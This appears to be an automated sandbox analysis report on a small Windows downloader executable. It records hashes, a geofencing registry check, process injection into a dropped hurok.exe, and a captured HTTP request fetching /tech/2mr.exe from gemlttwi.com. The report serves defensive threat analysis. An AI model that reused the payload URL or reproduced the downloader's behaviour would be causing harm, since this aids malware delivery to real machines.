Analysis
- max time kernel: 142s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 10/07/2023, 16:08 UTC
Static task: static1
Behavioral task: behavioral1
- Sample: d19312ee85bd12exeexeexeex.exe
- Resource: win7-20230703-en
Behavioral task: behavioral2
- Sample: d19312ee85bd12exeexeexeex.exe
- Resource: win10v2004-20230703-en
General
- Target: d19312ee85bd12exeexeexeex.exe
- Size: 42KB
- MD5: d19312ee85bd1234950bac0c5ba1e894
- SHA1: eda2ad1051c2f656411c47bee5727ef347fbb81e
- SHA256: edb81fb6bc2cd5b8d32e0e8389d36e2e5acc9de7c97f898036731f06e7bad979
- SHA512: abb42a90d13c496b9866122c26f084cafae853f8b6429c112be00124bcaa61a7bfc8ceca1f17002fa2badfccbe8ac2bdc00b8d07840e028d554fbbbdb94dfc19
- SSDEEP: 768:Kf1K2exg2kBwtdgI2MyzNORQtOflIwoHNV2XBFV72BOlA7ZsBGGpebVIYLHA3KxG:o1KhxqwtdgI2MyzNORQtOflIwoHNV2Xb
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description: Key value queried | ioc: \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | process: d19312ee85bd12exeexeexeex.exe
  description: Key value queried | ioc: \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | process: hurok.exe
- Executes dropped EXE (1 IoC)
  pid: 4888 | process: hurok.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (3 IoCs)
  description: PID 372 wrote to memory of 4888 | pid: 372 | process: d19312ee85bd12exeexeexeex.exe | procid_target: 84
  description: PID 372 wrote to memory of 4888 | pid: 372 | process: d19312ee85bd12exeexeexeex.exe | procid_target: 84
  description: PID 372 wrote to memory of 4888 | pid: 372 | process: d19312ee85bd12exeexeexeex.exe | procid_target: 84
Processes
- C:\Users\Admin\AppData\Local\Temp\d19312ee85bd12exeexeexeex.exe (PID 372)
  command line: "C:\Users\Admin\AppData\Local\Temp\d19312ee85bd12exeexeexeex.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\hurok.exe (PID 4888)
    command line: "C:\Users\Admin\AppData\Local\Temp\hurok.exe"
    - Checks computer location settings
    - Executes dropped EXE
Network
- Remote address 8.8.8.8:53
  Request: 76.32.126.40.in-addr.arpa IN PTR
  Response: (empty)
- Remote address 8.8.8.8:53
  Request: gemlttwi.com IN A
  Response: gemlttwi.com IN A 192.185.35.56
- Remote address 192.185.35.56:443
  Request:
    GET /tech/2mr.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: gemlttwi.com
    Cache-Control: no-cache
  Response:
    HTTP/1.1 404 Not Found
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://gemlttwi.com/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2,h2c
    Connection: Upgrade
    Vary: Accept-Encoding
    X-Endurance-Cache-Level: 2
    X-nginx-cache: WordPress
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
- Remote address 8.8.8.8:53
  Request: 56.35.185.192.in-addr.arpa IN PTR
  Response: 56.35.185.192.in-addr.arpa IN PTR immacbytescom
- Remote address 8.8.8.8:53
  Request: 101.14.18.104.in-addr.arpa IN PTR
  Response: (empty)
- Remote address 8.8.8.8:53
  Request: 101.15.18.104.in-addr.arpa IN PTR
  Response: (empty)
- Remote address 8.8.8.8:53
  Request: 254.178.238.8.in-addr.arpa IN PTR
  Response: (empty)
- Remote address 8.8.8.8:53
  Request: 45.8.109.52.in-addr.arpa IN PTR
  Response: (empty)
- Remote address 8.8.8.8:53
  Request: 88.156.103.20.in-addr.arpa IN PTR
  Response: (empty)
- Remote address 8.8.8.8:53
  Request: 69.121.18.2.in-addr.arpa IN PTR
  Response: 69.121.18.2.in-addr.arpa IN PTR a2-18-121-69.deploy.static.akamaitechnologies.com
- Remote address 8.8.8.8:53
  Request: 84.65.42.20.in-addr.arpa IN PTR
  Response: (empty)
Traffic summary (counters as reported: bytes and counts per flow)
Type          Request                                Response        Counters
HTTP Request  GET https://gemlttwi.com/tech/2mr.exe  404             4.7kB 115.3kB 92 89
DNS Request   76.32.126.40.in-addr.arpa                              71 B 157 B 1 1
DNS Request   gemlttwi.com                           192.185.35.56   58 B 74 B 1 1
DNS Request   56.35.185.192.in-addr.arpa                             72 B 100 B 1 1
DNS Request   101.14.18.104.in-addr.arpa                             72 B 134 B 1 1
DNS Request   101.15.18.104.in-addr.arpa                             72 B 134 B 1 1
DNS Request   254.178.238.8.in-addr.arpa                             72 B 126 B 1 1
DNS Request   45.8.109.52.in-addr.arpa                               70 B 144 B 1 1
DNS Request   88.156.103.20.in-addr.arpa                             72 B 158 B 1 1
DNS Request   69.121.18.2.in-addr.arpa                               70 B 133 B 1 1
DNS Request   84.65.42.20.in-addr.arpa                               70 B 156 B 1 1
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 42KB
  MD5: 41d38f31bce6e04f6432f6c1178d5b57
  SHA1: 9b01ff342c14b85bc823f02a8e3555e0cd043fff
  SHA256: 74325a720813e28270ee1c03aedf73c3cd0b23988ad2b2d9326777a25db2ad6e
  SHA512: c3d070e43db73662ef063c9aa3ed5bbdb8aa9c563821de342853707a16b96c7dc27af80647e6543e6292c2c80dd682f268c58a5edbba5233f50b657b3d6b0036